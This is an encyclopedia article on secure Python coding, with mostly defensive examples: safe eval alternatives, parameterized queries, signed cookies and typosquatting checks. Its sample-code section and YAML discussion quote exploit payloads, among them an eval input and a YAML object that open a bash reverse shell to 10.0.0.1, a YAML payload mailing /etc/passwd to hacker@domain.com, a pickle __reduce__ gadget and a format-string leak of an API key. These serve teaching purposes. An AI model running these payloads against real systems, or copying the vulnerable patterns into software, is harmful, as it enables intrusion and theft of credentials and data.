Secure Coding with Python

Article Info

Contributed by
2 authors

Last updated on
2020-08-11 03:30:08

Article Versions

Version 5, 2020-08-11 03:30:08, by sangeetha-prabhu: Pysa details added.
Version 4, 2020-03-22 12:08:31, by arvindpdmn: Title case change. Publishing.
Version 3, 2020-03-22 11:55:33, by sangeetha-prabhu: Adding content to article. Images uploaded. Ready for review.
Version 2, 2020-03-20 16:44:58, by sangeetha-prabhu: Added more tags. See Alsos. Identified some questions.
Version 1, 2019-01-03 16:31:53, by arvindpdmn: First version.

Writing secure code is essential for protecting sensitive data and maintaining correct behaviour of applications. This is more relevant today when most applications connect to the web, exchange data and even update themselves. While security considerations and best practices are typically language agnostic, in this article we focus on Python-specific issues.

OWASP's Python Security project has identified three angles: Security in Python (white-box analysis, functional analysis), Security of Python (black-box analysis), and Security with Python (develop security-hardened Python).

While some vulnerabilities are due to the way Python modules and functions behave, others are due to the manner in which third-party packages are distributed. Since Python is an open developer ecosystem, anyone can share their own packages that others can use in their projects. However, this opens up a security risk that developers need to be aware of.

Discussion

What are some guidelines for writing more secure Python code?
Python2's input() is problematic. Source: Branca 2014, slide 28.
It's essential to validate user input. If not, an attacker could execute arbitrary code. Python's eval(), exec(), Python 2's input(), os.popen(), os.system() and the subprocess functions (when a shell is invoked) are dangerous in this regard. These could be used to bypass authentication or inject code. For example, Python 2's input() evaluates whatever is typed as a Python expression. In the statement if passwd == input("Please enter your password"):, typing the variable name passwd makes the comparison passwd == passwd, which is always true and bypasses authentication.
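One way to avoid eval() on user input is sketched below, assuming the application only needs to add two numbers supplied as text. The function name safe_addition is hypothetical. It relies on ast.literal_eval(), which accepts only Python literals and rejects function calls and attribute access.

```python
import ast
from numbers import Real


def safe_addition(a, b):
    """Add two numbers given as text without evaluating arbitrary code."""
    # literal_eval() parses literals only; a call such as
    # __import__('os').system(...) raises ValueError instead of running.
    values = [ast.literal_eval(text) for text in (a, b)]
    if not all(isinstance(value, Real) for value in values):
        raise ValueError("both inputs must be numbers")
    return values[0] + values[1]


print(safe_addition("1", "2"))
```

Inputs that are not plain numeric literals raise ValueError (or SyntaxError if they cannot be parsed at all), which the caller can treat as invalid input.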
Databases are also vulnerable to inputs. Building database commands directly from user input is dangerous and enables what is commonly called SQL injection. Instead, validate the inputs and query databases via parameterized queries or an ORM. Among the well-known Python ORMs are Django ORM, SQLAlchemy and Peewee.
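As a minimal sketch of a parameterized query, the example below uses the standard sqlite3 module with an in-memory database. The users table and the find_user helper are made up for illustration. The ? placeholder passes the value to the driver as data, so it is never parsed as SQL.

```python
import sqlite3

# Illustrative in-memory database with a hypothetical users table
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", 1), ("bob", 0)])


def find_user(connection, name):
    """Look up a user by name using a bound parameter, not string formatting."""
    query = "SELECT name, is_admin FROM users WHERE name = ?"
    return connection.execute(query, (name,)).fetchall()


print(find_user(conn, "alice"))
# A classic injection string is treated as an (unknown) user name
print(find_user(conn, "alice' OR '1'='1"))
```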
Python's assert statement must be used only to check invariants while debugging. Using it for authentication (such as assert user.is_admin, "user does not have access") is wrong. Production servers often run Python with optimization enabled (the -O flag), in which case __debug__ is False and assert statements are skipped entirely.
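An explicit check that raises an exception keeps working regardless of optimization flags. The sketch below assumes a hypothetical User class and delete_account function; only the pattern matters.

```python
class User:
    """Hypothetical user model, for illustration only."""

    def __init__(self, name, is_admin=False):
        self.name = name
        self.is_admin = is_admin


def delete_account(user, target):
    # Unlike assert, this check is not removed when Python runs with -O
    if not user.is_admin:
        raise PermissionError("user does not have access")
    return "deleted {}".format(target)


print(delete_account(User("root", is_admin=True), "guest"))
```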
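To create temporary files, avoid the deprecated tempfile.mktemp() function. It only returns a file name, which leaves a window for another process to create that file first. Prefer tempfile.mkstemp() or tempfile.NamedTemporaryFile(), which create the file securely. In general, keep your Python distribution and the packages you use up to date. For example, earlier CPython implementations of Python had overflow bugs that could be exploited for arbitrary code execution.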
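A short sketch of the safer alternative follows. The helper name write_scratch and the file prefix are assumptions. NamedTemporaryFile() creates and opens the file in one step, so there is no gap between choosing a name and creating the file.

```python
import os
import tempfile


def write_scratch(data):
    """Write bytes to a securely created temporary file and return its path."""
    # delete=False keeps the file after the with-block so the caller can use it
    with tempfile.NamedTemporaryFile(prefix="scratch-", delete=False) as handle:
        handle.write(data)
        return handle.name


path = write_scratch(b"hello")
with open(path, "rb") as handle:
    print(handle.read())
os.remove(path)  # the caller is responsible for cleanup
```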
How should I manage Python dependencies for a more secure application?
Process flow of a typosquatting attack on PyPI. Source: Bertus 2018.
PyPI is the repository from where third-party Python packages can be downloaded and installed if required by your project. Direct dependencies may have further dependencies. Any of these could have malicious code.
It's easy to create a malicious package based on a well-known package since the original code is open source and easily copied. Often these packages behave normally since the malicious code only resides in setup.py that executes once during installation. This is enough to install software that can later steal data or monitor behaviour. Some attacks modify the original code, for example, to steal SSH credentials.
Developers can be tricked into installing the wrong package by a slight modification of the original package name. This is called typosquatting. There are plenty of examples: acqusition impersonates acquisition; bzip impersonates bz2file; crypt impersonates crypto; setup-tools impersonates setuptools; urlib3 impersonates urllib3; diango impersonates django.
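PEP 458 proposes signing repository metadata so that clients can verify that a package really comes from PyPI and hasn't been tampered with in transit. However, this verifies only the origin of a package, not that its code is benign. To catch malicious packages, a combination of dynamic analysis (within a sandbox) and static analysis can be used.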
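As a rough illustration of how typosquatted names might be flagged before installation, the sketch below compares a requested name against a small list of well-known packages using the standard difflib module. The list, the function name possible_typosquat and the 0.8 similarity cutoff are all assumptions. A real check would need a much larger list and would still miss many cases.

```python
import difflib

# Hypothetical allow-list of package names the project actually intends to use
KNOWN_PACKAGES = ["acquisition", "django", "jellyfish", "setuptools", "urllib3"]


def possible_typosquat(name, known=KNOWN_PACKAGES, cutoff=0.8):
    """Return the known package that name closely resembles, or None."""
    normalized = name.lower().replace("_", "-")
    if normalized in known:
        return None  # exact match with a known package
    matches = difflib.get_close_matches(normalized, known, n=1, cutoff=cutoff)
    return matches[0] if matches else None


for candidate in ["urllib3", "urlib3", "diango", "setup-tools"]:
    print(candidate, "->", possible_typosquat(candidate))
```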
What security risks do Python strings pose if used improperly?
Python3 introduced str.format() as a more powerful and flexible way to format strings. This method is called on a format string and it accepts Python objects as arguments. The problem is that attributes of these arguments can be accessed from within the format string. If the application gives users control of the format string, it can be misused to leak sensitive data.
There are a few cases where such control may be common. Applications that are translated into multiple languages may use untrusted translators who may be given control of the format string. Some applications may permit users to configure behaviour that might be exposed as format strings.
An example exploit is the code "{person.__init__.__globals__[CONFIG][API_KEY]}".format(person=person), where sensitive global data from a CONFIG dictionary is being accessed via the argument.
We can overcome this by validating the format string. One approach is shown by Armin Ronacher who subclasses Formatter and Mapping, makes use of formatter_field_name_split and throws an AttributeError if unsafe formats are detected.
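The idea of validating the format string can be sketched as follows. This is not Ronacher's implementation. It is a simplified version that subclasses string.Formatter and rejects any field that touches a name starting with an underscore. The class name SafeFormatter is an assumption.

```python
import re
import string


class SafeFormatter(string.Formatter):
    """Formatter that refuses underscore-prefixed attributes and keys."""

    def get_field(self, field_name, args, kwargs):
        # Split "person.__init__.__globals__[CONFIG]" into its components
        for part in re.split(r"[.\[\]]", field_name):
            if part.startswith("_"):
                raise AttributeError("access to {!r} is not allowed".format(part))
        return super().get_field(field_name, args, kwargs)


class Person:
    def __init__(self, name):
        self.name = name


formatter = SafeFormatter()
print(formatter.format("Hi, my name is {person.name}.", person=Person("Vickie")))
```

With this formatter, a format string such as "{person.__init__.__globals__}" raises AttributeError instead of exposing module globals. Blocking underscore names is a deny-list, so it only narrows the attack surface. Public attributes of the formatted objects remain reachable.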
What's a secure way to do data deserialization in Python?
An example exploit of pickle. Source: Branca 2014, slide 33.
Deserialization recreates Python objects by reading their representation from disk or a network interface. It's possible to deserialize malicious data and thereby execute arbitrary code in your system. This is because objects are not just values. They contain constructors and methods that are executable code.
For example, a web application could store user information in a cookie that's formed using the pickle module (or cPickle in Python 2). An attacker can craft an object whose __reduce__ method returns a callable and arguments of their choosing, and that callable is invoked during deserialization. A better approach would be to use json.loads(). If pickle is used, verify the payload integrity using cryptographic signatures. The standard hmac module can do this. PyCrypto was once a common choice but is no longer maintained.
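A minimal sketch of a signed JSON cookie is shown below, using only the standard library. The names SECRET_KEY, sign and verify are hypothetical, and the key shown is a placeholder. In practice the key would come from secure configuration.

```python
import hashlib
import hmac
import json

SECRET_KEY = b"replace-with-a-real-secret"  # placeholder, not a real key


def sign(data):
    """Serialize data as JSON and prepend an HMAC-SHA256 tag."""
    payload = json.dumps(data, sort_keys=True)
    tag = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return "{}.{}".format(tag, payload)


def verify(cookie):
    """Return the decoded data, or raise ValueError if the tag doesn't match."""
    tag, _, payload = cookie.partition(".")
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    # compare_digest() avoids leaking information through timing differences
    if not hmac.compare_digest(tag, expected):
        raise ValueError("cookie signature mismatch")
    return json.loads(payload)


cookie = sign({"name": "Max"})
print(verify(cookie))
```

Because the payload is JSON, loading it yields only dictionaries, lists, strings and numbers. The signature check additionally rejects cookies that were altered by the client.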
Another serialization format is YAML. YAML files can represent Python objects. Like pickle, it's possible to modify them to bypass authentication or execute arbitrary code. For example, configuration files in Ansible are YAML files. The following payload reads /etc/passwd and emails its contents to the attacker's address: !!python/object/apply:os.system ["cat /etc/passwd | mail hacker@domain.com"]. Essentially, it's unwise to deserialize from an untrusted source. A safer alternative is to use yaml.safe_load() rather than yaml.load().
What are some resources for Python developers to create more secure code?
Python core modules that can help developers build security features include hashlib, hmac and secrets. For passwords and security tokens, secrets must be preferred over random. Functions hmac.compare_digest() and secrets.compare_digest() are designed to mitigate timing attacks.
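The snippet below sketches how secrets and hmac might be used together. The function names new_api_key and tokens_match are assumptions made for illustration.

```python
import hmac
import secrets


def new_api_key():
    """Generate a key from the OS's cryptographically secure random source."""
    return secrets.token_hex(16)  # 16 random bytes as 32 hex characters


def tokens_match(supplied, expected):
    """Compare two tokens in a way that resists timing attacks."""
    return hmac.compare_digest(supplied, expected)


key = new_api_key()
print(len(key), tokens_match(key, key))
```

A plain == comparison can return as soon as the first differing character is found, which can leak how much of a guess was correct. compare_digest() is designed to avoid that.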
Bandit is a useful static linter that can alert developers to common security issues in code. Another static analyzer, open sourced by Facebook, is Pysa. To audit installed packages and their versions, use a tool such as Chef InSpec. PyUp tracks thousands of Python packages for vulnerabilities and makes pull requests to your codebase automatically when there are updates.
Python Security is an OWASP project aimed at creating a security-hardened version of Python. Their page on security concerns in modules and functions is worth reading. They've also curated a list of Python libraries for security applications.
Some Python Enhancement Proposals (PEPs) specific to security are worth reading for in-depth understanding. Among them are PEP458, PEP506, PEP551, and PEP578.

Milestones

Dec
2008

Python 3.0 is released. This release includes PEP 3101 -- Advanced String Formatting. Strings can now be formatted using the str.format() method. For more secure code, it's noted that applications shouldn't format strings from untrusted sources. The next best approach is to ensure that string formatting doesn't result in visible side effects, though this is not easy to achieve given the open nature of Python.

Jul
2011

Different approaches to modify a pickle stream. Source: Slaviero 2011, fig. 3.

Marco Slaviero publishes a detailed report on the many possible exploits and attack scenarios on the pickle module. He gives guidelines on how to write shellcode to create such exploits. He provides a library of exploits that can retrieve a list of globals and locals, make operating system calls, execute arbitrary Python code, alter local variables or mount DoS attacks.

Dec
2016

Python 3.6.0 is released. This release includes the secrets module that's documented in PEP 506. Python's existing random module is not suited for security purposes. Though documentation makes this clear, many implementations are seen to ignore this warning. To solve this problem, secrets module includes ready-to-use functions for managing passwords, tokens and other secrets.

Oct
2018

Malicious packages found on PyPI via static analysis. Source: Bertus 2018.

Bertus, a software security engineer, creates a static analysis tool to automatically detect if a package published on PyPI is malicious. From a scan of 123,000 packages, he identifies about a dozen such packages containing various exploits.

Nov
2019

Overview of role metadata on PyPI. Source: Kuppusamy et al. 2013, fig. 1.

Discussions start towards implementing PEP 458 -- Secure PyPI downloads with signed repository metadata. Although this PEP was started in 2013, funding has become available only recently. The idea of this proposal is that authors need not sign the packages they upload to PyPI. PyPI will automatically sign these packages using keys managed by PyPI. This is called the minimum security model. This PEP doesn't address the maximum security model in which authors can sign the packages.

Dec
2019

German software developer Lukas Martini finds two packages on PyPI that are doing typosquatting. These are python3-dateutil (impersonating dateutil) and jeIlyfish (impersonating jellyfish). The former doesn't have any malicious code but it imports the latter. Package jeIlyfish downloads a file, decodes that into Python code and executes it. This code attempts to read SSH and GPG keys from the computer and send them to a specific IP address.

Aug
2020

Pysa tracks data flows through the program. Source: Bleaney and Cepel 2020.

Facebook open sources Pysa, a static analysis tool to detect and prevent security issues in Python code. It's shipped as part of Pyre, a static type checker tool. Pysa tracks data flows. Developers define sources where data originates and sinks where data shouldn't end up. It warns when data reaches a sink. It has techniques to mitigate false positives and false negatives.

Sample Code

# Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
# Accessed: 2020-03-21
 
# --------------------------------------------------
# Exploit of eval()
def addition(a, b):
  return eval("%s + %s" % (a, b))
 
# Such an input might be a JSON response to a network request
userinput = {
  "a": "__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')#",
  "b": "2"
}
result = addition(userinput['a'], userinput['b'])
print("The result is %d." % result)
 
 
# --------------------------------------------------
# Exploit of exec()
# Can be exploited in the same way as eval()
# Note: exec() always returns None, but the injected code still runs
def addition(a, b):
  return exec("%s + %s" % (a, b))
 
 
# --------------------------------------------------
# Bypass authentication in Python2's input()
# Python3's input() will convert input to a string and is therefore safer
user_pass = get_user_pass("admin")
if user_pass == input("Please enter your password"):
  login()
else:
  print "Password is incorrect!"
 
# Bypass authentication if user enters 'user_pass'
# Python2 evaluates the typed text, so the check becomes:
# if user_pass == user_pass:   (this always evaluates as true)

# Source: https://medium.com/poka-techblog/rotten-pickles-a-quick-introduction-to-offensive-serialization-techniques-83fd4dd36edb
# Accessed: 2020-03-21
# Example using pickle (cPickle in Python2)

import base64
import pickle
import subprocess

from flask import Flask, request

app = Flask(__name__)

# Definition of a user
class User(object):
    def __init__(self, name):
        self.name = name

# The user is serialized along the way using
# something like:
# userdata = base64.b64encode(pickle.dumps(user))
# resp.set_cookie('userdata', userdata)

# Insecure Flask route: it unpickles data that the client controls
@app.route('/welcome/', methods=['GET'])
def index():
    userdata = request.cookies.get("userdata")
    user = pickle.loads(base64.b64decode(userdata))
    return "Greetings, {}".format(user.name)

# __reduce__() is called when the object is pickled. It returns a callable
# and its arguments, and that callable is invoked during deserialization.
class BadUser(object):
    def __init__(self, name):
        self.name = name
    def __reduce__(self):
        # On load, the server calls subprocess.check_output(["uname", "-a"])
        return (subprocess.check_output, (["uname", "-a"],))

baduser = BadUser("Max")
bad_cookie = base64.b64encode(pickle.dumps(baduser))
 
 
# Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
# Accessed: 2020-03-21
# Example using PyYAML

import yaml

class Person:
  def __init__(self, name):
    self.name = name
 
new_person = Person("Vickie")
print(yaml.dump(new_person))
 
# This will print:
# !!python/object:__main__.Person {name: Vickie}
# Someone can attack an application by changing 'Vickie' to 'Admin'
# and then loading it using yaml.load(YAML_FILE)
 
# Someone can execute arbitrary code by changing the line to the following example:
# !!python/object/apply:os.system ["bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"]

# Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
# Accessed: 2020-03-21
 
CONFIG = {
  "API_KEY": "771df488714111d39138eb60df756e6b" 
}
 
class Person(object):
  def __init__(self, name):
    self.name = name
 
def print_nametag(format_string, person):
  return format_string.format(person=person)
 
person = Person("Vickie")
 
# Okay call that will print: Hi, my name is Vickie. I am a Person.
greeting = print_nametag("Hi, my name is {person.name}. I am a {person.__class__.__name__}.", person)
print(greeting)
 
# Malicious call: the format may be read as a user input:
# print_nametag(input("Please format your nametag: "), person)
greeting = print_nametag("{person.__init__.__globals__[CONFIG][API_KEY]}", person)
print(greeting)

References

Cite As

Devopedia. 2020. "Secure Coding with Python." Version 5, August 11. Accessed 2023-11-12. https://devopedia.org/secure-coding-with-python

languages security data serialization dependency management
